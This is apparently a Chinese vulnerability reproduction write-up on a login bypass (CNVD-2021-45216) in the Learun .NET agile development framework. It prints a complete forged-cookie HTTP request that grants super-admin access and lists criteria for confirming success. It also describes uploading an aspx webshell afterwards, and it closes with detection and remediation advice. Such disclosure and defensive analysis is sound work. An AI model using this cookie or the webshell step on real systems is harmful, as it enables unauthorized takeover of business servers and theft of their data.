上海力软敏捷开发框架登陆绕过漏洞复现
上海力软敏捷开发框架登陆绕过漏洞复现
0x00 漏洞概述
上海力软信息技术有限公司的敏捷开发框架(learun)是一套基于 .NET MVC 的 BS 架构二次开发平台,面向 OA、ERP、MIS、CRM、电商平台等各类业务系统的快速构建。框架既提供向导式配置生成功能模块的能力,也允许开发者在 Visual Studio 中基于框架源码直接扩展开发,因此在政企单位的信息化系统中有较为广泛的落地。
该框架存在一处登录态校验逻辑缺陷(CNVD-2021-45216),公开渠道披露时间为 2021-07-28。其核心问题在于框架用于标识登录身份的 Cookie 可以被一个通用固定值伪造,服务端未将该值与会话状态进行有效绑定,导致未认证的攻击者携带该固定 Cookie 值即可直接进入管理后台。该漏洞获得了较高危级评定,第三方漏洞库给出的 CVSS3 基础评分为 7.6(AV:N/AC:H/Au:N/C:C/I:C/A:C)。成功登入后台后,攻击者可进一步读取敏感信息;若目标系统启用了文件中心功能,还可以直接上传 aspx 类型的 Webshell,最终获取服务器控制权。
0x01 影响范围
- 影响产品:上海力软信息技术有限公司 敏捷开发框架;
- 影响版本:截至公开检索,厂商未发布受影响版本清单与补丁公告,具体版本边界无法核实,凡使用该框架默认登录态校验机制的部署均应视为潜在受影响;
- 网络指纹:目标站点页面源码中包含路径特征
/Home/AccordionIndex; - 部署形态:框架常被二次开发为具体业务系统交付,实际资产名称往往不直接体现"力软"字样,需要结合指纹特征排查。
0x02 漏洞分析
框架在用户完成登录后,会向浏览器写入一个名为 LoginUserKey 的 Cookie,后续访问受保护页面时,服务端以该 Cookie 的取值判断当前请求是否来自已登录用户,并据此还原用户身份与权限。
依据利用样本中呈现的请求事实,存在一个长度八百余字符的十六进制固定取值,该取值在多个部署环境中均可被服务端接受为有效的超级管理员登录态。这意味着服务端在校验 LoginUserKey 时,依赖的是 Cookie 自身的取值匹配,而未与服务器侧会话存储、客户端特征或时效信息进行交叉绑定,属于典型的"客户端持有即身份"类逻辑缺陷。上述会话绑定失效的内部机制为依据请求行为的推断;可直接确认的事实是:未经过任何登录流程、仅携带该固定 Cookie 值发起的请求,即可获得呈现管理界面与超级管理员身份标识的响应。
由于该校验逻辑位于框架公共认证层,框架之上开发的各业务模块(包括文件中心等附件管理功能)通常沿用同一登录态,因此绕过登录态后攻击者的可达面覆盖后台全部功能。
0x03 利用链与请求包
利用过程为单次请求:向目标站点请求登录后才可访问的框架主界面导航页 /Home/AccordionIndex,并在请求头中携带伪造的 LoginUserKey Cookie。完整请求包如下(目标地址以 192.0.2.10 示意):
GET /Home/AccordionIndex HTTP/1.1
Host: 192.0.2.10
Cookie: LoginUserKey=13C2C1A702AE2DE0B13BAE5085D505F75E94A75EFE2500EC034DF8E3BE42BA36EA6EE41F2890656FE1073EFC6A92DCCF30367C8AFBAE0C34F0AC4F76B8C0995F73E764F9DDC7464272886569FBF022E1E2F6AA660D98726196A52EE3D49CF23551B118CE998A80BA2DF082D251F7411EDC6F055586EE5FD0F821B8AAA1E9B1C0FB69D508A9EC5536060349B467EEA2BADBA50F7383A2F997C6E8D057F8F434E1EAF92C642D04E179CF8F1D0FC1205FAF989DD811574D86FB781EF9623D2C9963AE101FF5F244EEE88C998F80CF554B4221D15969D5BC5D63C912D21D668581DC04AF3C0373EDA26601BC6157271F91F7F3087B03AE0D2304347BDCD129D94421A804D23CCFF4851D1559B78B6643B38720D4F3DD28D24EF120D19EFDBF8B6E5195AFA767736E3DCB00CDEA2983B0FE5815A97406D8D89ACF33528D961B701B0AE605261D80DEB27453806A4DBB38B5259BCCFA1E0CDB406A53C31258FC90F0136CA25631DF6E6487CC16CEF97330926F71AADDE01BDB149035BED1921D7321177BB3484BA8D134C07675660EE8D203AA6929B88D6995D485;其中:
LoginUserKey:框架登录态 Cookie 名称,等号后为通用固定取值,结尾的分号属于请求事实的一部分,需原样保留;/Home/AccordionIndex:登录后呈现的框架主界面导航页,用于承载登录态判定结果。
成功判定依据为响应同时满足以下三个条件:
1. 响应状态码为 200;
2. 响应体包含框架前端核心脚本引用 learunui-fr amework.js;
3. 响应体包含身份标识文本"超级管理员"。
三个条件同时成立,即表明伪造的登录态被服务端接受,当前会话已被识别为超级管理员。若未携带或携带错误的 Cookie 值,预期将无法满足上述判定(该页面通常重定向至登录入口,此行为为依据通用登录逻辑的推断)。
登入后台后的利用走向为:进入文件中心等附件管理功能,直接上传 aspx 类型的 Webshell 文件获得服务端控制权;不具备文件中心功能的环境中,攻击者至少可以遍历后台业务数据获取敏感信息。
0x04 检测与修复建议
- 排查公网、办公网边界及第三方托管环境中敏捷开发框架及其二次开发系统的部署情况,确认
/Home/AccordionIndex等后台路径的暴露范围; - 由于厂商未提供公开补丁链接,需关注厂商主页(https://www.learun.cn/)的版本更新通知,获取修复版本后升级,升级前做好配置与数据备份;
- 暂无法升级的系统,应收敛后台路径的访问来源,在网关层限制管理接口仅对可信地址开放,并补齐服务端会话校验逻辑,确保登录态与服务器侧会话绑定;
- 复核 Web 访问日志与操作审计,识别携带异常
LoginUserKey取值的请求,发现疑似利用行为后立即失效全部存量会话并复核账号权限配置。
0x05 参考资料
- CNVD-2021-45216:https://www.cnvd.org.cn/flaw/show/CNVD-2021-45216
- 阿里云漏洞库收录页:https://avd.aliyun.com/detail?id=AVD-2021-889941
- 力软科技厂商主页:https://www.learun.cn/

Wayyt 3小时前
最新评论